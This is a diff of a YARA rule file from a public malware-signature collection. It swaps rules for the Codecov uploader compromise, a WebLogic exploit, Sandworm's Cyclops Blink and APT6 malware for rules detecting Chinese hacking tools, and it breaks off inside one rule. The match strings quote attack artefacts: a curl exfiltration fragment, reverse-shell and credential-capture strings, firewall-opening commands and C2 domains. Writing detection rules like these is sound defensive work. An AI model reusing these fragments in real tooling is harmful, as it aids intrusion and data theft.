-		reference = "https://goo.gl/Mr6M2J"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irongate.yar#L67-L82"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L621-L638"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "56c3c7a98bcefa609ee604ea0d7d3f4dd237d91a9439eeed66e0d6f3a20dfdd0"
-		score = 40
+		hash = "0a173c5ece2fd4ac8ecf9510e48e95f43ab68978"
+		logic_hash = "e0cbcb63cd2a542e6394792070392d393b2a3485f5a5ef3c6ba0f113ae9270ec"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "83f0352c14fa62ae159ab532d85a2b481900fed50d32cc757aa3f4ccf6a13bee"
 
 	strings:
-		$s1 = "NetResView.exe" fullword wide
-		$s2 = "2005 - 2013 Nir Sofer" wide
+		$s0 = "\\\\localhost" fullword ascii
+		$s1 = "iis.run" fullword ascii
+		$s3 = ">Could not connecto %s" fullword ascii
+		$s5 = "WHOAMI" ascii
+		$s13 = "WinSta0\\Default" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 140KB and all of them
 }
-rule SIGNATURE_BASE_APT_SH_Codecov_Hack_Apr21_1 : FILE
+rule SIGNATURE_BASE_Switchsniffer : FILE
 {
 	meta:
-		description = "Detects manipulated Codecov bash uploader tool that has been manipulated by an unknown actor during March / April 2021"
+		description = "Chinese Hacktool Set - file SwitchSniffer.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b5fb74c4-073e-53af-a207-1672e63c9a64"
-		date = "2021-04-16"
+		id = "6019f042-10ab-5899-8b1b-28b2609e9623"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://about.codecov.io/security-update/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_codecov_hack.yar#L2-L17"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L640-L654"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1aa7723982a1b675ba6694f1af0eb28e5926b974874580bd727cf33a3f8d893a"
+		hash = "1e7507162154f67dff4417f1f5d18b4ade5cf0cd"
+		logic_hash = "4c75473399a7d47b63c6247248fd2792c675740ac671028b1c0a8ba1a02f35aa"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "Global report uploading tool for Codecov"
-		$s1 = "curl -sm 0.5 -d"
+		$s0 = "NextSecurity.NET" fullword wide
+		$s2 = "SwitchSniffer Setup" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x2123 and filesize < 70KB and all of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_Gen_Exploit_CVE_2017_10271_Weblogic : HIGHVOL CVE_2017_10271 FILE
+rule SIGNATURE_BASE_Dbexpora : FILE
 {
 	meta:
-		description = "Exploit for CVE-2017-10271 (Oracle WebLogic)"
-		author = "John Lambert @JohnLaTwC"
-		id = "e30e316f-1ebb-5c38-ba25-d2a9d0083a03"
-		date = "2018-03-21"
+		description = "Chinese Hacktool Set - file dbexpora.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "43297ce9-60f3-5b69-b7d8-904fffe622fe"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://github.com/c0mmand3rOpSec/CVE-2017-10271, https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_exploit_cve_2017_10271_weblogic.yar#L1-L26"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L656-L671"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "01e4f7b1c9c068f3953fa58749a14ea148d2b038c7266da789e0998eae83e1a7"
+		hash = "b55b007ef091b2f33f7042814614564625a8c79f"
+		logic_hash = "2dad6cedae6a3a446c2c4829516bffa5608ea4d1c13c907796cf4d13ec37965e"
 		score = 75
 		quality = 85
-		tags = "HIGHVOL, CVE-2017-10271, FILE"
-		hash1 = "376c2bc11d4c366ad4f6fecffc0bea8b195e680b4c52a48d85a8d3f9fab01c95"
-		hash2 = "7d5819a2ea62376e24f0dd3cf5466d97bbbf4f5f730eb9302307154b363967ea"
-		hash3 = "864e9d8904941fae90ddd10eb03d998f85707dc2faff80cba2e365a64e830e1d/subfile"
-		hash4 = "2a69e46094d0fef2b3ffcab73086c16a10b517f58e0c1f743ece4f246889962b"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<soapenv:Header"
-		$s2 = "java.beans.XMLDecoder"
-		$s3 = "void" fullword
-		$s4 = "index="
-		$s5 = "/array>"
-		$s6 = "\"start\""
-		$s7 = "work:WorkContext" nocase
+		$s0 = "SELECT A.USER FROM SYS.USER_USERS A " fullword ascii
+		$s12 = "OCI 8 - OCIDescriptorFree" fullword ascii
+		$s13 = "ORACommand *" fullword ascii
 
 	condition:
-		filesize < 10KB and ( uint32( 0 ) == 0x616f733c or uint32( 0 ) == 0x54534f50 ) and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 835KB and all of them
 }
-rule SIGNATURE_BASE_APT_Sandworm_Cyclopsblink_Notable_Strings : FILE
+rule SIGNATURE_BASE_Sqlcracker : FILE
 {
 	meta:
-		description = "Detects notable strings identified within the Cyclops Blink executable"
-		author = "NCSC"
-		id = "81ccf582-41f5-5fe5-8afc-e008e01289ff"
-		date = "2022-02-23"
+		description = "Chinese Hacktool Set - file SQLCracker.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7d7ff2cf-81fb-5a04-a97f-577c306137a9"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_cyclops_blink.yar#L6-L37"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L673-L690"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fdd3a1de9d178370fcc66dbca4628d7bedfbc002bca9e463e11cb444302900ea"
+		hash = "1aa5755da1a9b050c4c49fc5c58fa133b8380410"
+		logic_hash = "3724f4b746da413f99880564ae72bc0de867120f1f7eacaf856d42492ebe359e"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "3adf9a59743bc5d8399f67cab5eb2daf28b9b863"
-		hash2 = "c59bc17659daca1b1ce65b6af077f86a648ad8a8"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$proc_name1 = "[kworker/0:1]"
-		$proc_name2 = "[kworker/1:1]"
-		$dns_query = "POST /dns-query HTTP/1.1\x0d\x0aHost: dns.google\x0d\x0a"
-		$iptables1 = "iptables -I %s -p tcp --dport %d -j ACCEPT &>/dev/null"
-		$iptables2 = "iptables -D %s -p tcp --dport %d -j ACCEPT &>/dev/null"
-		$sys_recon1 = "{\"ver\":\"%x\",\"mods\";["
-		$sys_recon2 = "uptime: %lu mem_size: %lu mem_free: %lu"
-		$sys_recon3 = "disk_size: %lu disk_free: %lu"
-		$sys_recon4 = "hw: %02x:%02x:%02x:%02x:%02x:%02x"
-		$testpath = "%s/214688dsf46"
-		$confpath = "%s/rootfs_cfg"
-		$downpath = "/var/tmp/a.tmp"
+		$s0 = "msvbvm60.dll" fullword ascii
+		$s1 = "_CIcos" fullword ascii
+		$s2 = "kernel32.dll" fullword ascii
+		$s3 = "cKmhV" fullword ascii
+		$s4 = "080404B0" fullword wide
 
 	condition:
-		( uint32( 0 ) == 0x464c457f ) and ( 8 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 125KB and all of them
 }
-rule SIGNATURE_BASE_APT_Sandworm_Cyclopsblink_Module_Initialisation : FILE
+rule SIGNATURE_BASE_Freeversion_Debug : FILE
 {
 	meta:
-		description = "Detects the code bytes used to initialise the modules built into Cyclops Blink"
-		author = "NCSC"
-		id = "c81b92c4-3f70-5bbd-acfa-ed1e1d33461d"
-		date = "2022-02-23"
+		description = "Chinese Hacktool Set - file debug.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2d69a39a-0da5-56ca-87a5-9116dea6c950"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_cyclops_blink.yar#L39-L55"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L692-L711"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8bde37f642cf07e323beabaacd5c62f8422b451777fc1fc4a6bdf474db49de12"
+		hash = "d11e6c6f675b3be86e37e50184dadf0081506a89"
+		logic_hash = "f7f8302c70c5aed1885724a1bca4efdf0547cc5be62e7dd6bcd8cc2079f71f96"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "3adf9a59743bc5d8399f67cab5eb2daf28b9b863"
-		hash2 = "c59bc17659daca1b1ce65b6af077f86a648ad8a8"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = {94 21 FF F0 93 E1 00 08 7C 3F 0B 78 38 00 00 ?? 7C 03
-      03 78 81 61 00 00 8E EB FF F8 7D 61 5B 78 4E 80 00 20}
+		$s0 = "c:\\Documents and Settings\\Administrator\\" ascii
+		$s1 = "Got WMI process Pid: %d" ascii
+		$s2 = "This exploit will execute" ascii
+		$s6 = "Found token %s " ascii
+		$s7 = "Running reverse shell" ascii
+		$s10 = "wmiprvse.exe" fullword ascii
+		$s12 = "SELECT * FROM IIsWebInfo" fullword ascii
 
 	condition:
-		( uint32( 0 ) == 0x464c457f ) and ( any of them )
+		uint16( 0 ) == 0x5a4d and filesize < 820KB and 3 of them
 }
-rule SIGNATURE_BASE_APT_Sandworm_Cyclopsblink_Modified_Install_Upgrade : FILE
+rule SIGNATURE_BASE_Dos_Look : FILE
 {
 	meta:
-		description = "Detects notable strings identified within the modified install_upgrade executable, embedded within Cyclops Blink"
-		author = "NCSC"
-		id = "4c4f7262-df74-5f6a-afc0-df1fcae4741c"
-		date = "2022-02-23"
+		description = "Chinese Hacktool Set - file look.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "910d1469-9173-5a7d-91ea-a50ee921f662"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_cyclops_blink.yar#L57-L88"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L713-L728"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "69b89dbaf3e2661f376ff1be7c19e96c82bf84fd572fea422c109f8afdd1e5aa"
+		hash = "e1a37f31170e812185cf00a838835ee59b8f64ba"
+		logic_hash = "341c72eaa5db1953e008423374c3f322de0f8dc33fd8181362172982b52e2b8a"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "3adf9a59743bc5d8399f67cab5eb2daf28b9b863"
-		hash2 = "c59bc17659daca1b1ce65b6af077f86a648ad8a8"
-		hash3 = "7d61c0dd0cd901221a9dff9df09bb90810754f10"
-		hash4 = "438cd40caca70cafe5ca436b36ef7d3a6321e858"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = "/pending/%010lu_%06d_%03d_p1"
-		$ = "/pending/sysa_code_dir/test_%d_%d_%d_%d_%d_%d"
-		$ = "etaonrishdlcupfm"
-		$ = "/pending/WGUpgrade-dl.new"
-		$ = "/pending/bin/install_upgraded"
-		$ = {38 80 4C 00}
-		$ = {38 80 4C 05}
-		$ = {38 80 4C 04}
-		$ = {3C 00 48 4D 60 00 41 43 90 09 00 00}
+		$s1 = "<description>CHKen QQ:41901298</description>" fullword ascii
+		$s2 = "version=\"9.9.9.9\"" fullword ascii
+		$s3 = "name=\"CH.Ken.Tool\"" fullword ascii
 
 	condition:
-		( uint32( 0 ) == 0x464c457f ) and ( 6 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 40KB and all of them
 }
-rule SIGNATURE_BASE_APT_Sandworm_Cyclopsblink_Core_Command_Check : FILE
+rule SIGNATURE_BASE_Ntgodmode : FILE
 {
 	meta:
-		description = "Detects the code bytes used to test the command ID being sent to the core component of Cyclops Blink"
-		author = "NCSC"
-		id = "46066474-7647-52fb-b40d-30ff8e285b6e"
-		date = "2022-02-23"
+		description = "Chinese Hacktool Set - file NtGodMode.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3de620bf-0405-536b-9f6d-3a7f02417b20"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_cyclops_blink.yar#L90-L104"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L730-L747"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "71c9da1f0e9e64be87293c985f2a4a59a6c87ffd127ce5104ebe95a0ccb316af"
-		score = 50
+		hash = "8baac735e37523d28fdb6e736d03c67274f7db77"
+		logic_hash = "55efa908ebfcede207d3fe0b1072cce262af0e627e91ba8746e7a8924b8e75bd"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "3adf9a59743bc5d8399f67cab5eb2daf28b9b863"
-		hash2 = "c59bc17659daca1b1ce65b6af077f86a648ad8a8"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$cmd_check = {81 3F 00 18 88 09 00 05 54 00 06 3E 2F 80 00 (07|0A|0B|0C|0D) }
+		$s0 = "to HOST!" fullword ascii
+		$s1 = "SS.EXE" fullword ascii
+		$s5 = "lstrlen0" fullword ascii
+		$s6 = "Virtual" fullword ascii
+		$s19 = "RtlUnw" fullword ascii
 
 	condition:
-		( uint32( 0 ) == 0x464c457f ) and ( #cmd_check == 5 )
+		uint16( 0 ) == 0x5a4d and filesize < 45KB and all of them
 }
-rule SIGNATURE_BASE_APT_Sandworm_Cyclopsblink_Config_Identifiers : FILE
+rule SIGNATURE_BASE_Webcrack4_Routerpasswordcracking : FILE
 {
 	meta:
-		description = "Detects the initial characters used to identify Cyclops Blink configuration data"
-		author = "NCSC"
-		id = "db5b3a4a-82c2-500a-88f6-340b3392eac8"
-		date = "2022-02-23"
+		description = "Chinese Hacktool Set - file WebCrack4-RouterPasswordCracking.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e3d50ff8-e58d-5c60-9acd-25ba95a21f68"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_cyclops_blink.yar#L106-L126"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L749-L766"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6fa39442d717a69dd6f31a4bb2e5865c3f16156ce24a2b419d95ed751bb0d8ee"
+		hash = "00c68d1b1aa655dfd5bb693c13cdda9dbd34c638"
+		logic_hash = "48456f82163806852ecef3d71c2c8247f6c74c31ce28472c80a914a98247bdb3"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "3adf9a59743bc5d8399f67cab5eb2daf28b9b863"
-		hash2 = "c59bc17659daca1b1ce65b6af077f86a648ad8a8"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = {3C 00 3C 6B 60 00 3A 20 90 09 00 00}
-		$ = {3C 00 3C 63 60 00 3A 20 90 09 00 00}
-		$ = {3C 00 3C 73 60 00 3A 20 90 09 00 00}
+		$s0 = "http://www.site.com/test.dll?user=%USERNAME&pass=%PASSWORD" fullword ascii
+		$s1 = "Username: \"%s\", Password: \"%s\", Remarks: \"%s\"" fullword ascii
+		$s14 = "user:\"%s\" pass: \"%s\" result=\"%s\"" fullword ascii
+		$s16 = "Mozilla/4.0 (compatible; MSIE 4.01; Windows NT)" fullword ascii
+		$s20 = "List count out of bounds (%d)+Operation not allowed on sorted string list%String" wide
 
 	condition:
-		( uint32( 0 ) == 0x464c457f ) and ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 5000KB and 2 of them
 }
-rule SIGNATURE_BASE_APT_Sandworm_Cyclopsblink_Handle_Mod_0Xf_Command : FILE
+rule SIGNATURE_BASE_Hscan_Gui : FILE
 {
 	meta:
-		description = "Detects the code bytes used to check module ID 0xf control flags and a format string used for file content upload"
-		author = "NCSC"
-		id = "36646b7a-389d-5fd9-88a1-e43e7224763a"
-		date = "2022-02-23"
+		description = "Chinese Hacktool Set - file hscan-gui.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "27f9d2e9-0a62-57ca-9061-c32945c59c7e"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_cyclops_blink.yar#L128-L150"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L768-L783"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6e3eebe404c8cd24e1e16eb3c881b1eda78ba6b365bf89c2557329e6f89396ac"
+		hash = "1885f0b7be87f51c304b39bc04b9423539825c69"
+		logic_hash = "c87cfe78324638ac9d35c7fd1e47f24014c470b0892ceceaf394278d9706157b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "3adf9a59743bc5d8399f67cab5eb2daf28b9b863"
-		hash2 = "c59bc17659daca1b1ce65b6af077f86a648ad8a8"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = {54 00 06 3E 54 00 07 FE 54 00 06 3E 2F 80 00 00}
-		$ = {54 00 06 3E 54 00 07 BC 2F 80 00 00}
-		$ = {54 00 06 3E 54 00 07 7A 2F 80 00 00}
-		$ = {54 00 06 3E 54 00 06 F6 2F 80 00 00}
-		$ = "file:%s\n" fullword
+		$s0 = "Hscan.EXE" fullword wide
+		$s1 = "RestTool.EXE" fullword ascii
+		$s3 = "Hscan Application " fullword wide
 
 	condition:
-		( uint32( 0 ) == 0x464c457f ) and ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 550KB and all of them
 }
-rule SIGNATURE_BASE_APT_Sandworm_Cyclopsblink_Default_Config_Values : FILE
+rule SIGNATURE_BASE_S_Multifunction_Scanners_S : FILE
 {
 	meta:
-		description = "Detects the code bytes used to set default Cyclops Blink configuration values"
-		author = "NCSC"
-		id = "04067609-1173-51f2-907f-2a236aae6c7c"
-		date = "2022-02-23"
+		description = "Chinese Hacktool Set - file s.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7fb90a59-116d-5fa7-b85b-cbb1af660666"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_cyclops_blink.yar#L152-L174"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L785-L809"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "180993057c110c0c0327b673c6d6e251534012de51cf6475838691e0942a1aa8"
+		hash = "79b60ffa1c0f73b3c47e72118e0f600fcd86b355"
+		logic_hash = "96f0692c54d74388f8602a03475d95a2fcd89692dd189f9363592745a70c234b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "3adf9a59743bc5d8399f67cab5eb2daf28b9b863"
-		hash2 = "c59bc17659daca1b1ce65b6af077f86a648ad8a8"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = {38 00 00 19 90 09 01 A4}
-		$ = {3C 00 00 01 60 00 80 00 90 09 01 A8}
-		$ = {38 00 40 00 90 09 01 AC}
-		$ = {38 00 01 0B 90 09 01 B0}
-		$ = {38 00 27 11 90 09 01 C0}
+		$s0 = "C:\\WINDOWS\\temp\\pojie.exe /l=" fullword ascii
+		$s1 = "C:\\WINDOWS\\temp\\s.exe" fullword ascii
+		$s2 = "C:\\WINDOWS\\temp\\s.exe tcp " fullword ascii
+		$s3 = "explorer.exe http://www.hackdos.com" fullword ascii
+		$s4 = "C:\\WINDOWS\\temp\\pojie.exe" fullword ascii
+		$s5 = "Failed to read file or invalid data in file!" fullword ascii
+		$s6 = "www.hackdos.com" fullword ascii
+		$s7 = "WTNE / MADE BY E COMPILER - WUTAO " fullword ascii
+		$s11 = "The interface of kernel library is invalid!" fullword ascii
+		$s12 = "eventvwr" fullword ascii
+		$s13 = "Failed to decompress data!" fullword ascii
+		$s14 = "NOTEPAD.EXE result.txt" fullword ascii
 
 	condition:
-		( uint32( 0 ) == 0x464c457f ) and ( 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 8000KB and 4 of them
 }
-rule SIGNATURE_BASE_APT_Sandworm_Cyclopsblink_Handle_Mod_0X51_Command : FILE
+rule SIGNATURE_BASE_HKTL_CN_Dos_Getpass : FILE
 {
 	meta:
-		description = "Detects the code bytes used to check commands sent to module ID 0x51 and notable strings relating to the Cyclops Blink update process"
-		author = "NCSC"
-		id = "a6800aed-27dc-5d01-b005-1eb4a62344a3"
-		date = "2022-02-23"
-		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_cyclops_blink.yar#L176-L200"
+		description = "Chinese Hacktool Set - file GetPass.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "08635096-474c-5fdf-825e-6c7c8c8d4061"
+		date = "2015-06-13"
+		modified = "2023-01-06"
+		old_rule_name = "Dos_GetPass"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L811-L830"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8a68f4a5f5b7a45819e9a198881aa41b75a65181b63788c8b824b339bfd6fc67"
+		hash = "d18d952b24110b83abd17e042f9deee679de6a1a"
+		logic_hash = "ea1410984fb1f66422faa943f1f16873f4e0d5ff1afa68c2d28f36889e214a52"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "3adf9a59743bc5d8399f67cab5eb2daf28b9b863"
-		hash2 = "c59bc17659daca1b1ce65b6af077f86a648ad8a8"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$cmd_check = {88 1F [2] 54 00 06 3E 2F 80 00 (01|02|03) }
-		$path1 = "/etc/wg/configd-hash.xml"
-		$path2 = "/etc/wg/config.xml"
-		$mnt_arg1 = "ext2"
-		$mnt_arg2 = "errors=continue"
-		$mnt_arg3 = {38 C0 0C 20}
-		$mnt_arg4 = {38 C0 0C 21}
+		$s0 = "GetLogonS" ascii
+		$s3 = "/showthread.php?t=156643" ascii
+		$s8 = "To Run As Administ" ascii
+		$s18 = "EnableDebugPrivileg" fullword ascii
+		$s19 = "sedebugnameValue" fullword ascii
 
 	condition:
-		( uint32( 0 ) == 0x464c457f ) and ( #cmd_check == 3 ) and ( ( @cmd_check [ 3 ] - @cmd_check [ 1 ] ) < 0x200 ) and ( all of ( $path* ) ) and ( all of ( $mnt_arg* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 890KB and all of them
 }
-rule SIGNATURE_BASE_APT6_Malware_Sample_Gen : FILE
+rule SIGNATURE_BASE_HKTL_CN_Update_Pcmain : FILE
 {
 	meta:
-		description = "Rule written for 2 malware samples that communicated to APT6 C2 servers"
+		description = "Chinese Hacktool Set - file PcMain.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "142d2714-f7bf-5725-bf7e-9497be7ed234"
-		date = "2016-04-09"
+		id = "24c9ba6f-0772-59c9-8bea-3a8bf7823e4c"
+		date = "2015-06-13"
 		modified = "2023-01-06"
-		reference = "https://otx.alienvault.com/pulse/56c4d1664637f26ad04e5b73/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt6_malware.yar#L8-L55"
+		old_rule_name = "update_PcMain"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L832-L858"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "614a6673579630fc254d3c546161647e619df5a03ee6f21434d6cc50be1ed187"
-		score = 80
-		quality = 83
+		hash = "aa68323aaec0269b0f7e697e69cce4d00a949caa"
+		logic_hash = "aa905379f65a8d964b921f2b74b61d94f97536466a7fc48f05c437d617cf35f6"
+		score = 90
+		quality = 85
 		tags = "FILE"
-		hash1 = "321ec239bfa6927d39155ef5f10741ed786219489bbbb1dc8fee66e22f9f8e80"
-		hash2 = "7aef130b19d1f940e4c4cee6efe0f190f1402d2e0f741ee605c77518a04cb6d7"
 
 	strings:
-		$x2 = "SPCK!it is a [(?riddle?) wrapped in a {mystery}] inside an <enigma>!" fullword ascii
-		$x3 = "636C7369643A46334430443336462D323346382D343638322D413139352D373443393242303344344146" fullword ascii
-		$s1 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" fullword ascii
-		$s2 = "DUMPTHIN" fullword ascii
-		$s3 = "\"C:\\WINDOWS\\system32\\" ascii
-		$s4 = "window.eval(f.decodeURIComponent(a));" fullword ascii
-		$s5 = "/tbedrs.dll" fullword ascii
-		$s6 = "NSISDL/1.2 (Mozilla)" fullword ascii
-		$s7 = "NSIS_Inetc (Mozilla)" fullword ascii
-		$s8 = "/logos.gif" fullword ascii
-		$s9 = "synflood" fullword ascii
-		$s10 = "IconFile=C:\\WINDOWS\\system32\\SHELL32.dll" fullword ascii
-		$s11 = "udpflood" fullword ascii
-		$s12 = "shellcode" fullword ascii
-		$s13 = "&PassWord=" fullword ascii
-		$s14 = "SystemPropertiesProtection.exe" fullword ascii
-		$s15 = "SystemPropertiesRemote.exe" fullword ascii
-		$c1 = "jobcall.org" ascii
-		$c2 = "sportsinfinite.com" ascii
-		$c3 = "milsatcom.us" ascii
-		$c4 = "geographicphotographer.com" ascii
